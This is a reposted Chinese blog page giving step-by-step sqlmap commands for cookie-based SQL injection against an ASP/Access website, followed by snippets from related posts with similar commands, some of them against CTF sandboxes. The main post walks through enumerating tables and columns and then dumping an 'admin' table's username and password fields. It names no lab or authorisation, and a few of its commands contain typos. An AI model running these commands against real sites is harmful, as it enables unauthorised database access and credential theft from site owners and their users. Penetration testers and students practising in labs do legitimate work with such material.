SQLMAP渗透笔记之Cookie中转注入

最新推荐文章于 2024-07-24 15:27:34 发布
转载 最新推荐文章于 2024-07-24 15:27:34 发布 · 2.6k 阅读 · 0

本文介绍如何使用SQLMap工具通过Cookie中转进行数据库注入攻击。主要包括:判断数据库类型、获取服务器信息、提取数据表及字段等内容。适用于Access数据库,对于MySQL或MSSQL则需额外设置参数。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >



---------------------------------------------------------------------------------------------


                SQLMAP渗透笔记之Cookie中转注入


                                     


---------------------------------------------------------------------------------------------


注:此方法使用于access数据库,mysql、MSSQL数据库请在第二步获取站点当前数据库及数据库,方法与常规mysql、MSSQL注入一样,只不过在后面加上了“--level 2”这个参数,其他参数照常使用。


1.判断数据库,获取服务器,网站环境等参数


sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --table --level 2


例:
sqlmap.py -u "http://www.xx.com/show.asp" --cookie "id=187" --talbe --level 2




2.获取字段


sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --columns -T 数据表 --level 2


例:
sqlmap.py -u "http://www.xx.com/show.asp" --cookie "id=187" --columns -T admin --level 2




3.获取字段中的内容


sqlmap.py -u http://www.xx.com/show.asp --cookie "id=187" --dump -T 表名 -C "字段名1,字段名2"  --level 2


例:
sqlmap.py -u "http://www.xx.com/show.asp" --cookie "id=187" --dump admin -C "username,password" --level 2
Birdman-one
关注
渗透工具- SQLMap
LJH1999ZN的博客
02-13 732
一、sqlmap的介绍
WEB渗透Web突破篇-SQL注入SQLMAP
最新发布
qq_59468567的博客
07-31 1624
sqlmap --url="" -p username --user-agent=SQLMAP --random-agent --threads=10 --risk=3 --level=5 --eta --dbms=MySQL --os=Linux --banner --is-dba --users --passwords --current-user --dbs -p 指定注入点,注入参数 --user-agent 指定user-agent --random-agent 随机user-agent
Sqlmap2021 -- Cookie注入
Web安全工具库
07-07 4271
喧闹任其喧闹,自有我自为之,我自风情万种,与世无争。。。 ---- 网易云热评 一、检测Cookie注入 1、通过BurpSuite抓包,将封包内容保存到1.txt GET /sqli/Less-20/index.php HTTP/1.1 Host: 192.168.139.129 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x.
sqlmap指定cookie_利用SQLMap进行cookie注入
weixin_39640024的博客
01-14 510
SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用 到cookie注入,一遇到cookie注入就去使用注入中转工具,比较麻烦。刚好今天群里的USB问起sqlmap是否支持cookie注入,就研究了 一下,发现其实sqlmap进行cookie注入很简单的。还不会使用sqlmap的同学可以学习一下这两篇本站推荐文章...
SQL labs-SQL注入(五,使用sqlmap进行cookie注入
2302_80280669的博客
07-24 1160
Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":当用户访问 web 页面时,他的名字可以记录在 cookie 中。在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。
sqlmap之(五)----Cookie注入实战
你身后的人
04-21 1260
(1) cookie注入,猜解表  [html] view plain copy sqlmap.py -u "http://192.168.87.129/shownews.asp" --cookie "id=27" --table --level 2    do you want to URL encode cookie values (implementation specific)? [Y/n...
SQLMAP渗透笔记
04-25
SQLMAP渗透笔记
关于ctfhub中cookie注入方法之sqlmap自动注入
m0_62819604的博客
10-23 820
首先,我们可以使用burpsuite进行抓包。 如图所示,可以发现注入点为id=1。 然后我们可以使用kali linux里的sqlmap自动注入。 首先查询数据库名称sqlmap -u "http://challenge-593b577518b0da97.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs 发现数据库为sqli 然后查询数据库表sqlmap -u "http://challenge-593b57751..
利用Sqlmap自动化注入工具实现cookie注入与交互式写shell
hehigoxqc606的博客
10-13 563
我是小白,这是我个人的学习记录,如有不对的地方,欢迎留言评论,以便我尽快改正,谢谢。 记录成长,充实生活! Sqlmap简介: Sqlmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)的特性,支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列,支持自动识别密码哈希格式并通过字典破解密码哈希(只是有关...
sqlmap渗透工具
07-06
SQLMap是一款强大的、自动化SQL注入攻击工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全研究人员或渗透测试人员有效地发现和利用网站应用程序中的数据库安全漏洞。在Python环境中运行,SQLMap提供了一系列...
sqlmap中转注入
Anonymous
01-14 2280
当使用 sqlmap 测试注入点时出现下列信息时,就需要在请求网址时忽略SSL证书 python3 sqlmap.py -u "http://xxxx?&daxxtae=null&parame=xxxxxx" --batch --delay=1 --random-agent ___ __H__ ___ ___["]_____ ___ ___ {1.5.4.7#dev} |_ -| . [)] | .'| . | |___|_ ["]_|_|_|__
利用SQLMap进行cookie注入
kuxing100的专栏
05-05 2108
SQLMap被称为注入神器,N多大神都使用SQLmap来进行注入测试,我等小菜当然也会用来装一下A*C,用了N久SQLMAP了,但是极少用到cookie注入,一遇到cookie注入就去使用注入中转工具,比较麻烦。刚好今天群里的USB问起sqlmap是否支持cookie注入,就研究了一下,发现其实sqlmap进行cookie注入很简单的。 测试URL:   参数获取使用的是
sqlmap之access——cookie注入
qq_45300786的博客
07-18 371
先把这个GET传参(id=171)删了 然后复制下这个网址,用sqlmapsqlmap.py -u "http://59.63.200.79:8004/shownews.asp" --cookie "id=170" level 2 包网址起来,然后 参数,后面跟 值包起来, 等级为2 才会对cookie注入进行检车 跑出来类型是Cookie ...
渗透工具sqlmap学习
陈宇明
02-01 3072
对于网络安全人员来说,掌握渗透工具的使用方法是一项必备的技能。 sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由python语言开发而成,因此运行需要安装python环境。 检测注入点 显示数据库名称 当前的数据库 数据库使用账户 列出数据库用户 数据库账户与密码 列出数据库中的表 列出表中字段 显示字段内容 指定导出特定范围的字
关于cookie注入使用sqlmap
weixin_43326436的博客
06-10 348
1. python2 sqlmap.py -u http://challenge-d18082c9146962c3.sandbox.ctfhub.com:10080 --cookie id=1 --dbs --level 2 2. python2 sqlmap.py -u http://challenge-d18082c9146962c3.sandbox.ctfhub.com:10080 --cookie id=1 --D sqli --tables --level 2 3. python2 sqlmap.
SQLmap————4、Cookie注入
Fly_鹏程万里
05-04 1049
说明:默认情况下SQLMAP只支持GET/POST参数的注入测试,但是当使用–level 参数且数值>=2的时候也会检查cookie时面的参数,当>=3的时候将检查User-agent和Referer,那么这就很简单了,我们直接在原有的基础上面加上 –level 2 即可!1、判断是否可以注入Sqlmap –u http://www.xxx.com/cookie/test.asp  -...
kali攻防第7章补充 SQLMAP介绍之Cookie注入
安全参透之旅
12-03 1939
SQLMAP介绍之Cookie注入   准备工具 1、KALI 系统IP:10.10.10.131 2、受害网站:
sqlmap对dvwa SQL Injection进行带cookie注入
m0_63283172的博客
02-27 967
sqlmap对dvwa中输点进行带cookie注入测试
sqlmap----Cookie注入实战
小明师傅博客
06-06 595
这里我们用封神台的靶场演示 一个典型的cookie注入 测试时被waf,限制了 上sqlmap sqlmap.py -u "xxxxxxxx/shownews.asp" --cookie "?id=170" --leve2 --table 这里不知道为什么leve 5 不行,不过2是专门给cookie注入用的,还有这里为什么不爆库呢,因为这里是asp+access数据库,查询不了,所以直接查2表 拿到密码,找后台,登陆 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值